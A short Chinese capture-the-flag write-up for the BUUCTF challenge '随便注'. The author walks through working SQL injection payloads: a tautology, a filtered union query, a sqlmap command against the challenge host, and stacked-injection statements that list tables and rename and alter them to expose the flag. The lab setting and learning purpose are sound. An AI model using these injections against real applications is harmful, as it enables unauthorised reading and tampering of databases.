BUUCTF-[强网杯 2019]随便注

Posted 2021-03-08 echodetected

随便注？

那么我就不客气了，先试试返回真值：

‘ or 1=1#

返回了所有查询内容，共三条，order by猜测字段长，发现为2，验证了一下：

日常操作：

‘ or 1=1 union select 1,table_name,3 from information_schema.tables#

匹配关键字？百度一下发现是被过滤了，没法使用上面的语句进行查询

手注总没有自动好用，拿去sqlmap跑一下，注出库名：supersqli

C:Program FilesPython38sqlmap>python sqlmap.py -u "http://0232d970-6f71-4069-8a93-55f18f3a06d7.node3.buuoj.cn/?inject=1" --forms --batch --dbs

但是想看表的时候，返回库里面不存在表，无论怎么都注不出来

无奈去看大佬的WP，看到是sql堆叠注入

上面注出了supersqli所以这里只去看这个库

1‘;show tables from supersqli#

1‘;show columns from `1919810931114514`#

找到flag在哪里了

但是不会查看，去看了别人的方法：

payload：

0‘;rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#

参考资料：https://www.jianshu.com/p/6c6a44517dd7

一知半解的样子，虽然网上答案很多，但是基本上模板都是那几个，这个大佬的讲解还挺不错的